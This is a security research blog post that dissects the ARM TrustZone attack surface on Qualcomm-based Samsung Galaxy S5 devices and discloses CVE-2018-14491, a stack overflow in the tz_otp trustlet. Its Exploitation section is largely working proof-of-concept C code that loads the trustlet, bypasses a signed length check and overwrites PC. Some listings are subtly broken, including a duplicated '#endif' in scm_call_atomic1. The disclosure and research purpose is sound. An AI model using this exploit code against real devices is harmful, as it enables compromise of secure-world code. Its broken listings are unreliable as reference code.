Attacking the ARM's TrustZone

Posted Tue 31 July 2018
Author Joffrey Guilbon
Category Reverse-Engineering
Tags TrustZone, ARM, reverse-engineering, 2018

An overview of TrustZone was given in a previous article. This second article takes a more technical look at the attack surface and hotspots exposed to an attacker, and at what can be done once code execution is achieved at the different privilege levels available in TrustZone.

TrustZone attack surface

Determining the target attack surface is always the first step in the vulnerability research process. The TrustZone attack surface consists of three components:

The handler of messages addressed directly to the monitor.
Third-party applications (trustlets) running in TrustZone.
The Secure Boot component, which may allow code execution before the loading of the TrustZone and thus the ability to subvert the TrustZone itself.

This blogpost highlights vulnerabilities in the first two components listed above, along with their implications and what can be done with them.

Following User Inputs

In order to carry out a vulnerability search, one must determine the attack surface offered to an attacker, i.e. what parameters can be used to influence the program. To do this, one has to follow the arguments passed from the Normal World to the Secure World, to determine how the functions available in the Secure World are invoked.

Browsing the open source communication driver

To figure out how arguments are passed from the Normal World to the Secure World, i.e. how arguments are passed within an SMC (Secure Monitor Call), we can browse the open source Normal World driver. As the driver source code shows, the function that executes the SMC instruction (named smc) is called by the scm_call functions (where scm stands for Secure Channel Manager). scm_call is used whenever information needs to be passed from the Normal World to the Secure World; this is done by filling in the following structure:

/**
 * struct scm_command - one SCM command buffer
 * @len: total available memory for command and response
 * @buf_offset: start of command buffer
 * @resp_hdr_offset: start of response buffer
 * @id: command to be executed
 * @buf: buffer returned from scm_get_command_buffer()
 *
 * An SCM command is laid out in memory as follows:
 *
 *        ------------------- <--- struct scm_command
 *        | command header  |
 *        ------------------- <--- scm_get_command_buffer()
 *        | command buffer  |
 *        ------------------- <--- struct scm_response and
 *        | response header |      scm_command_to_response()
 *        ------------------- <--- scm_get_response_buffer()
 *        | response buffer |
 *        -------------------
 *
 * There can be arbitrary padding between the headers and buffers so
 * you should always use the appropriate scm_get_*_buffer() routines
 * to access the buffers in a safe manner.
 */
struct scm_command {
        u32        len;
        u32        buf_offset;
        u32        resp_hdr_offset;
        u32        id;
        u32        buf[0];
};

The answer from the TrustZone kernel is received through the scm_response structure:

/**
 * struct scm_response - one SCM response buffer
 * @len: total available memory for response
 * @buf_offset: start of response data relative to start of scm_response
 * @is_complete: indicates if the command has finished processing
 */
struct scm_response {
        u32        len;
        u32        buf_offset;
        u32        is_complete;
};
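
To make the layout described in the driver comment more concrete, here is a minimal userspace sketch of how the offsets in a command block can be computed. It mirrors the two structures above with standard C types. The helper names alloc_command and command_to_response are hypothetical and are not the driver's own routines. The sketch also assumes that the command size is a multiple of 4, so that the response header stays aligned.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Userspace mirror of the two driver structures shown above. */
struct scm_command {
    uint32_t len;
    uint32_t buf_offset;
    uint32_t resp_hdr_offset;
    uint32_t id;
    uint32_t buf[];          /* C99 flexible array member */
};

struct scm_response {
    uint32_t len;
    uint32_t buf_offset;
    uint32_t is_complete;
};

/* Hypothetical helper: allocate one zeroed block holding the command
 * header, the command buffer, the response header and the response buffer. */
struct scm_command *alloc_command(uint32_t id, size_t cmd_size, size_t resp_size)
{
    size_t len = sizeof(struct scm_command) + cmd_size
               + sizeof(struct scm_response) + resp_size;
    struct scm_command *cmd = calloc(1, len);
    if (cmd == NULL)
        return NULL;

    cmd->len = (uint32_t)len;
    cmd->id = id;
    /* The command buffer starts right after the command header... */
    cmd->buf_offset = (uint32_t)offsetof(struct scm_command, buf);
    /* ...and the response header right after the command buffer. */
    cmd->resp_hdr_offset = cmd->buf_offset + (uint32_t)cmd_size;
    return cmd;
}

/* Hypothetical helper: locate the response header from the stored offset. */
struct scm_response *command_to_response(struct scm_command *cmd)
{
    return (struct scm_response *)((uint8_t *)cmd + cmd->resp_hdr_offset);
}
```

With a 16-byte command and an 8-byte response, the block is 52 bytes long, the command buffer starts at offset 16 and the response header at offset 32. Every offset is stored in memory that the Normal World controls, which is exactly why the Secure World has to validate them.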

The listing below shows the last function actually executing the SMC opcode:

static u32 smc(u32 cmd_addr)
{
        int context_id;
        register u32 r0 asm("r0") = 1;
        register u32 r1 asm("r1") = (u32)&context_id;
        register u32 r2 asm("r2") = cmd_addr;
        do {
                asm volatile(
                        __asmeq("%0", "r0")
                        __asmeq("%1", "r0")
                        __asmeq("%2", "r1")
                        __asmeq("%3", "r2")
#ifdef REQUIRES_SEC
                        ".arch_extension sec\n"
#endif
                        "smc        #0        @ switch to secure world\n"
                        : "=r" (r0)
                        : "r" (r0), "r" (r1), "r" (r2)
                        : "r3");
        } while (r0 == SCM_INTERRUPTED);
        return r0;
}

In this listing, r1 points to a kernel stack address and r2 holds the physical address of the allocated scm_command structure. r0 is set to 1, indicating that this is a regular SCM call. However, for commands that require less data, or when no structure is needed, another form of scm_call exists.

This other form is called scm_call_atomic[1-4], where the number is the number of arguments passed to the monitor. These functions issue an SMC with the given arguments, service ID and command ID. The service ID, command ID and argument count are packed together into r0 using the SCM_ATOMIC macro. Because r0 is no longer equal to 1, the TrustZone kernel knows that this SCM is an atomic call with the argument count encoded in r0; the arguments themselves are placed in r2 to r5.

s32 scm_call_atomic1(u32 svc, u32 cmd, u32 arg1)
{
        int context_id;
        register u32 r0 asm("r0") = SCM_ATOMIC(svc, cmd, 1);
        register u32 r1 asm("r1") = (u32)&context_id;
        register u32 r2 asm("r2") = arg1;
        asm volatile(
                __asmeq("%0", "r0")
                __asmeq("%1", "r0")
                __asmeq("%2", "r1")
                __asmeq("%3", "r2")
#ifdef REQUIRES_SEC
                ".arch_extension sec\n"
#endif
#endif
                "smc        #0        @ switch to secure world\n"
                : "=r" (r0)
                : "r" (r0), "r" (r1), "r" (r2)
                : "r3");
        return r0;
}
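
The packing performed by SCM_ATOMIC can be sketched as follows. The bit layout and the two flag constants are reproduced here as an assumption, modelled on the MSM driver, and should be checked against the kernel tree of the device under study. The three decoder functions are hypothetical helpers added for illustration, for instance to interpret r0 values seen in a trace.

```c
#include <stdint.h>

/* Assumed encoding, modelled on the MSM driver's SCM_ATOMIC macro. */
#define SCM_CLASS_REGISTER (0x2u << 8)
#define SCM_MASK_IRQS      (1u << 5)
#define SCM_ATOMIC(svc, cmd, n) \
    (((((uint32_t)(svc) << 10) | ((uint32_t)(cmd) & 0x3ffu)) << 12) | \
     SCM_CLASS_REGISTER | SCM_MASK_IRQS | ((uint32_t)(n) & 0xfu))

/* Hypothetical decoders: recover each field from an r0 value. */
uint32_t scm_atomic_svc(uint32_t r0)   { return r0 >> 22; }
uint32_t scm_atomic_cmd(uint32_t r0)   { return (r0 >> 12) & 0x3ffu; }
uint32_t scm_atomic_nargs(uint32_t r0) { return r0 & 0xfu; }
```

Under these assumptions, SCM_ATOMIC(1, 2, 1) evaluates to 0x402221, a value that can never be confused with the r0 = 1 used by the regular scm_call path.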

First Attack Surface for an Attacker: Secure Monitor (Qualcomm based device)

Now that we have determined how the Normal World talks to the Secure World (thanks to the monitor, which acts as a bridge between worlds), we can search for a link between functions and their Service ID and Command ID.

To find the function requested by the Normal World, the monitor relies on a statically allocated array of structures. This static array corresponds to the attack surface available to an attacker. Each structure has the following format:

The concatenation of Service ID and Command ID;
A pointer to the string of the SCM function name;
An unknown integer;
A pointer to the handling function;
The number of arguments;
An array holding the size of each argument, one integer per argument.
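
The fields listed above can be sketched as a C structure, together with the kind of lookup a monitor might perform on it. This is an illustration only: every field name, the fixed MAX_SCM_ARGS bound, the handler prototype and the scm_lookup function are hypothetical. The (service ID << 10) | command ID encoding of the first field is also an assumption.

```c
#include <stddef.h>
#include <stdint.h>

#define MAX_SCM_ARGS 4   /* assumption: fixed bound used by this sketch only */

typedef int (*scm_handler_t)(const uint32_t *args);

/* Hypothetical layout of one table entry; field names are made up. */
struct scm_table_entry {
    uint32_t      id;                      /* service ID and command ID combined */
    const char   *name;                    /* SCM function name */
    uint32_t      unknown;                 /* purpose not identified */
    scm_handler_t handler;                 /* handling function */
    uint32_t      nargs;                   /* number of arguments */
    uint32_t      arg_sizes[MAX_SCM_ARGS]; /* size of each argument */
};

/* Linear search of the table for a (service, command) pair. */
const struct scm_table_entry *
scm_lookup(const struct scm_table_entry *table, size_t count,
           uint32_t svc, uint32_t cmd)
{
    uint32_t id = (svc << 10) | (cmd & 0x3ffu);
    for (size_t i = 0; i < count; i++) {
        if (table[i].id == id)
            return &table[i];
    }
    return NULL;   /* unknown call: nothing reachable from the Normal World */
}
```

Dumping such a table from a monitor image gives the name, argument count and handler address of every function reachable through an SCM, which is a convenient starting point for auditing them one by one.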

Vulnerability in Qualcomm's Trusted Execution Environment implementation

This bug was found by Gal Beniamini, who also reverse engineered the way the monitor handles messages. The bug, reproduced here on a Samsung Galaxy S5, is interesting because it enables arbitrary code execution in the most privileged mode of the processor: monitor mode (EL3).

Browsing through the list of all functions available through SCM and analyzing them one by one led to the discovery of a vulnerability in the tzbsp_es_is_activated function. This vulnerability allows writing a zero DWORD to an arbitrary address supplied by the attacker (in r0), including addresses inside the TrustZone monitor and kernel.
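
The class of bug described above can be illustrated with a toy model. The code below is neither Qualcomm's code nor the actual patch: the memory map, its constants and both handler functions are hypothetical. It only shows the difference between a handler that trusts a caller-supplied address and one that first checks that the written range lies entirely in non-secure memory.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Toy memory map: offsets below SECURE_START model Normal World memory,
 * the rest models secure memory. Callers must stay within MEM_SIZE. */
#define MEM_SIZE      64u
#define SECURE_START  32u

uint8_t toy_memory[MEM_SIZE];

/* Vulnerable pattern: the caller-supplied address is used unchecked,
 * so a zero DWORD can be written anywhere, secure memory included. */
void handler_unchecked(uint32_t addr)
{
    uint32_t zero = 0;
    memcpy(&toy_memory[addr], &zero, sizeof zero);
}

/* Hardened pattern: refuse any range that is not entirely non-secure. */
bool handler_checked(uint32_t addr)
{
    if (addr > SECURE_START - sizeof(uint32_t))
        return false;

    uint32_t zero = 0;
    memcpy(&toy_memory[addr], &zero, sizeof zero);
    return true;
}
```

Even a primitive as limited as writing zeros is dangerous at this privilege level, because it can be aimed at the data that security checks elsewhere in the monitor rely on.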

Exploitation of this vulnerability is not explained in this blogpost, but if you are interested you can read the blogpost of Gal Beniamini where it is fully analyzed.

The vulnerability was fixed with the following patch:

TrustZone monitor disassembly, patched version

Implications

This vulnerability allows an attacker to get arbitrary code execution at runtime in monitor mode (EL3). This could be used to backdoor the Normal World as well as the Secure World, but also to instrument the Secure World or attach a debugger to it (at the monitor or secure OS level) in order to find new vulnerabilities in the TrustZone OS (TEE-OS).

Vulnerability in Third-Party Application (CVE-2018-14491, Qualcomm based device)

Trustlets available for Qualcomm based devices can be retrieved under /system/vendor/firmware or /firmware/image and are split into several files, namely trustlet_name.b00, trustlet_name.b01... and trustlet_name.mdt. As written in the previous blogpost, Qualcomm's TrustZone implementation enables the operating system to load binaries into TrustZone to expand the features offered by the Secure Execution Environment. These binaries are called trustlets. The format of the trustlets available in the filesystem was completely reverse engineered by Gal Beniamini, and a script was developed to recreate a valid ELF that can be loaded into IDA.

However, once the trustlet file format has been reverse engineered, questions remain:

How can the Normal World ask the Secure World to load a trustlet?
How does the Normal World communicate with it at runtime?

Those tasks are carried out by the qseecom driver which provides an API to perform high-level tasks, relying on the primitives offered by the Secure Channel Manager (notably the scm_call function).

All the functions needed to load a trustlet are available through this kernel module, which populates the right structure with the command ID matching the functionality requested from the Secure World. The Normal World can then load a trustlet with the qseecom_load_app function and send data to it with __qseecom_send_cmd.

Once loaded into the Secure World, the kernel assigns an ID to the trustlet and calls its entry function. This entry function registers the trustlet to the TrustZone kernel and gives a handler routine which is triggered when the Normal World calls a trustlet's feature.

In the remaining part of this article we focus on the tz_otp version 1 trustlet, available on Samsung Galaxy S5 devices.

The handler function for received messages offers several commands. The first command sent must always be otp_init, which initializes the trustlet's internal state; without it, requests fall into trivial error handling. Looking at the available functions, we notice that they are all protected by a stack cookie except for one, called otp_resync_account. Reading the first lines of assembly of this function, we notice a BLE instruction, which is a signed comparison (it corresponds to the > 384 comparison in the Hex-Rays view). This is a godsend: our input buffer cannot contain null bytes, so any value we supply would be far larger than 384 if it were compared as an unsigned number. Thanks to the signed comparison, however, we can pass a negative value such as 0xFFFFFFFF in the buffer and follow the branch calling the function sub_68F8 (variable v3 is initialized to 0 at the beginning of the function).
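
The effect of the signed comparison can be reproduced in a few lines of C. This is a standalone sketch, not the trustlet's code: the function names and the MAX_LEN constant are chosen for illustration, and the conversion of 0xFFFFFFFF to -1 assumes a two's-complement target, as is the case on ARM.

```c
#include <stdbool.h>
#include <stdint.h>

#define MAX_LEN 384

/* Signed check, behaving like a BLE-style comparison. */
bool passes_signed_check(uint32_t raw)
{
    int32_t len = (int32_t)raw;   /* 0xFFFFFFFF is read as -1 */
    return len <= MAX_LEN;
}

/* Unsigned check, behaving like a BLS-style comparison. */
bool passes_unsigned_check(uint32_t raw)
{
    return raw <= (uint32_t)MAX_LEN;
}

/* True when none of the four bytes of the value is zero. */
bool has_no_null_byte(uint32_t raw)
{
    return (raw & 0x000000ffu) && (raw & 0x0000ff00u) &&
           (raw & 0x00ff0000u) && (raw & 0xff000000u);
}
```

The smallest 32-bit value without a null byte is 0x01010101, which is already far above 384, so no null-free value passes the unsigned check. 0xFFFFFFFF contains no null byte either, yet it passes the signed check because it is interpreted as -1.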

This function is particularly interesting because it contains a vulnerable memcpy() whose length and src arguments are controlled directly by the attacker through the buffer supplied from the Normal World. Since this function is not protected by a stack cookie either, no memory leak is needed. Yes, that means a stack overflow in a function with no cookie :-)

Implications

This vulnerability makes it possible to obtain arbitrary code execution in Secure World EL0 (Secure World user mode). This is particularly interesting because it offers the opportunity to issue system calls to the TrustZone kernel, and thus gives access to a new attack surface for elevating privileges to the TrustZone kernel. It also gives access to features of the TrustZone operating system, such as the open and read system calls, which provide access to the secure filesystem (SFS). The SFS is an encrypted filesystem available for persistent storage. It is encrypted with a special hardware key available only from the Secure World context, thereby ensuring the confidentiality of the data against a potentially compromised Normal World.

Reporting the vulnerability

The bug was reported to Samsung Mobile Security on July 3rd, 2018. Samsung confirmed that the bug exists on Qualcomm-based Samsung Galaxy S5 devices in some regions or for some carriers. The vulnerable component is obsolete and was disabled or removed in later models, while some regions or carriers have mitigated the bug. Nevertheless, Samsung said that they plan to patch the vulnerability in affected models.

Exploitation

To exploit this vulnerability, we need a way to interact with the kernel and ask it to load the trustlet into TrustZone. For convenience, we can adapt Gal Beniamini's work on Widevine to load and exploit the tz_otp trustlet. The reusable part is the initialization of the application handle: it consists in opening the libQSEEComAPI.so shared library, which exposes the functions required to communicate with the kernel and interact with TrustZone, such as QSEECom_start_app, QSEECom_stop_app and QSEECom_send_cmd.

The libQSEEComAPI.so library allows us to use the following code to load tz_otp into TrustZone:

int main() {

    //Getting the global handle used to interact with QSEECom
    struct qcom_tzotp_handle* handle = initialize_tzotp_handle();
    if (handle == NULL) {
        perror("[-] Failed to initialize tz_otp handle");
        return -errno;
    }

    //Loading the tz_otp application
    int res = (*handle->QSEECom_start_app)((struct QSEECom_handle **)&handle->qseecom,
                                            TZOTP_PATH, TZOTP_APP_NAME, TZOTP_BUFFER_SIZE);
    if (res < 0) {
        perror("[-] Failed to load tz_otp");
        return -errno;
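    }
    printf("[+] tz_otp load res: %d\n", res);

    //Initializing the trustlet state and triggering the overflow (crash() is defined in the next listing)
    return crash(handle);
}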

The listing below initializes the tz_otp state and triggers the vulnerability:

int otp_init(struct qcom_tzotp_handle* handle) {

    uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000);
    uint32_t cmd_resp_size = QSEECOM_ALIGN(8);
    uint32_t* cmd_req = malloc(cmd_req_size);
    uint32_t* cmd_resp = malloc(cmd_resp_size);

    memset(cmd_req, 0, cmd_req_size);
    memset(cmd_resp, 'B', cmd_resp_size);

    // OTP_INIT
    cmd_req[0] = OTP_INIT;
    cmd_req[1] = 0;
    cmd_req[2] = 0;
    cmd_req[3] = 0;
    cmd_req[4] = 0;
    cmd_req[5] = 0;

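    // The return value of QSEECom_set_bandwidth is deliberately ignored
    (void)(*handle->QSEECom_set_bandwidth)(handle->qseecom, true);
    int res = (*handle->QSEECom_send_cmd)(handle->qseecom,
                                          cmd_req,
                                          cmd_req_size,
                                          cmd_resp,
                                          cmd_resp_size);

    // Release the temporary buffers and report the result of the command
    free(cmd_req);
    free(cmd_resp);
    return res;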
}

int craft_buffer(uint32_t *cmd_req, int *index) {

    uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000);

    memset(cmd_req, 0, cmd_req_size);

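    // OTP_RESYNC_TOKEN
    cmd_req[0] = OTP_RESYNC_TOKEN;

    // Fill the request with a recognizable pattern
    int i;
    for (i = 1; i <= 0x551; i++) {
        cmd_req[i] = 0x41414141;
    }

    // Three filler words placed just before the word that overwrites PC
    cmd_req[i++] = JUNK;
    cmd_req[i++] = JUNK;
    cmd_req[i++] = JUNK;

    // Tell the caller where the PC value has to be written
    *index = i;

    // 0xFFFFFFFF is -1 when read as a signed integer, so it passes
    // the signed "> 384" check
    cmd_req[286] = 0xFFFFFFFF;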

    return 0;
}

int crash(struct qcom_tzotp_handle* handle) {

    uint32_t cmd_req_size = QSEECOM_ALIGN(0x4000);
    uint32_t cmd_resp_size = QSEECOM_ALIGN(8);
    uint32_t* cmd_resp = malloc(cmd_resp_size);
    uint32_t* cmd_req = malloc(cmd_req_size);
    int i;

    otp_init(handle);

    memset(cmd_resp, 'B', cmd_resp_size);

    craft_buffer(cmd_req, &i);
    cmd_req[i++] = JUNK+1; // PC

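    int res = (*handle->QSEECom_send_cmd)(handle->qseecom,
                                          cmd_req,
                                          cmd_req_size,
                                          cmd_resp,
                                          cmd_resp_size);

    // Release the temporary buffers and report the result of the command
    free(cmd_req);
    free(cmd_resp);
    return res;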
}

The result of the trustlet crash is available in the /sys/kernel/debug/tzdbg log file. It can be observed that the PC register contains the same value across two consecutive crashes. This information leaks the trustlet's memory mapping and makes it possible to build a ROP chain for the exploitation. It is now also possible to use any system call exposed by the TrustZone kernel!

Concerns

Two things here seem surprising.

First, stack cookies do not seem to be applied systematically. It is unclear why they are not applied to every function; one of our assumptions is that developers must annotate a function to tell the compiler to protect it with a stack cookie.

Secondly, although a form of ASLR is present, it seems that after the phone has been up for a certain time, each trustlet is systematically loaded at the same address, which considerably reduces the benefit of ASLR.

Conclusion

In this article we discussed the two attack surfaces offered to a user living in the Normal World, and detailed two vulnerabilities:

One vulnerability in the monitor, whose exploitation yields arbitrary code execution in the most privileged exception level of the CPU.
Another one in a trustlet, which yields arbitrary code execution in Secure World user mode (EL0).

This last vulnerability can be used to audit the security of the Secure OS running in TrustZone, and exposes a new attack surface to an attacker.

Acknowledgements

Jean-Baptiste Bédrune for the internship and his valuable tips,
Cédric Tessier for his advice,
Guillaume Delugré for his help,
Gal Beniamini for his answers to my emails,
Frederic Basse for his excellent work on Nexus 5 monitor mode,
Alexandre Adamski for code proofreading and suggested improvements,
Quarkslab colleagues for proofreading this article and for their kindness.

